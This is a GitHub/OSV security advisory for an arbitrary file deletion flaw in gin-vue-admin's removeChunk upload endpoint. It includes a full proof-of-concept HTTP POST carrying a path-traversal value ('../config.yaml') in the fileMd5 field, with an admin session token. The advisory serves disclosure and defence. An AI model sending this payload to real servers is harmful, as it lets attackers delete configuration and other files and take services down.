GHSA-jrhg-82w2-vvj7
Suggest an improvement- Source
- https://github.com/advisories/GHSA-jrhg-82w2-vvj7
- Import Source
- https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2025/12/GHSA-jrhg-82w2-vvj7/GHSA-jrhg-82w2-vvj7.json
- JSON Data
- https://api.osv.dev/v1/vulns/GHSA-jrhg-82w2-vvj7
- Aliases
- Published
- 2025-12-02T01:08:48Z
- Modified
- 2025-12-02T01:27:48.126317Z
- Severity
-
- 8.7 (High) CVSS_V4 - CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N CVSS Calculator
- Summary
- Gin-vue-admin has an arbitrary file deletion vulnerability
- Details
-
Impact
Attackers can delete any file on the server at will, causing damage or unavailability of server resources. Attackers can control the 'FileMd5' parameter to delete any file and folder
The affected code:
Affected interfaces: /api/fileUploadAndDownload/removeChunk
POC: You can specify the FileMd5 value as the directory or file you want to delete
```POST /api/fileUploadAndDownload/removeChunk HTTP/1.1 Host: 127.0.0.1:8080 Content-Length: 78 sec-ch-ua: "Not=A?Brand";v="99", "Chromium";v="118" x-token: eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJVVUlEIjoiOGYzYTdjMmMtYjAwMC00ODFmLWEyNGYtYzQyMDc2NTFjNWRmIiwiSUQiOjEsIlVzZXJuYW1lIjoiYWRtaW4iLCJOaWNrTmFtZSI6Ik1yLuWlh-a3vCIsIkF1dGhvcml0eUlkIjo4ODgsIkJ1ZmZlclRpbWUiOjg2NDAwLCJpc3MiOiJxbVBsdXMiLCJhdWQiOlsiR1ZBIl0sImV4cCI6MTc2MzIxNDQzMywibmJmIjoxNzYyNjA5NjMzfQ.7BTnRq65JDiPdlb0gJuAUa2nifIDTtePsnDnAtZoFJQ sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.5993.90 Safari/537.36 Content-Type: application/json Accept: application/json, text/plain, / x-user-id: 1 sec-ch-ua-platform: "Windows" Origin: http://127.0.0.1:8080 Sec-Fetch-Site: same-origin Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Referer: http://127.0.0.1:8080/ Accept-Encoding: gzip, deflate, br Accept-Language: zh-CN,zh;q=0.9 Cookie: x-token=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJVVUlEIjoiOGYzYTdjMmMtYjAwMC00ODFmLWEyNGYtYzQyMDc2NTFjNWRmIiwiSUQiOjEsIlVzZXJuYW1lIjoiYWRtaW4iLCJOaWNrTmFtZSI6Ik1yLuWlh-a3vCIsIkF1dGhvcml0eUlkIjo4ODgsIkJ1ZmZlclRpbWUiOjg2NDAwLCJpc3MiOiJxbVBsdXMiLCJhdWQiOlsiR1ZBIl0sImV4cCI6MTc2MzIxNDQzMywibmJmIjoxNzYyNjA5NjMzfQ.7BTnRq65JDiPdlb0gJuAUa2nifIDTtePsnDnAtZoFJQ Connection: close
{"fileName":"ceshi.jpg","fileMd5":"../config.yaml","filePath":"./fileDir/ceshi.jpg"} ```
Patches
Please wait for the latest patch
References
https://github.com/flipped-aurora/gin-vue-admin
- Database specific
{ "nvd_published_at": "2025-12-01T23:15:53Z", "github_reviewed": true, "github_reviewed_at": "2025-12-02T01:08:48Z", "severity": "HIGH", "cwe_ids": [ "CWE-22" ] }- References
Affected packages
Go / github.com/flipped-aurora/gin-vue-admin
Package
- Name
- github.com/flipped-aurora/gin-vue-admin
- View open source insights on deps.dev
- Purl
- pkg:golang/github.com/flipped-aurora/gin-vue-admin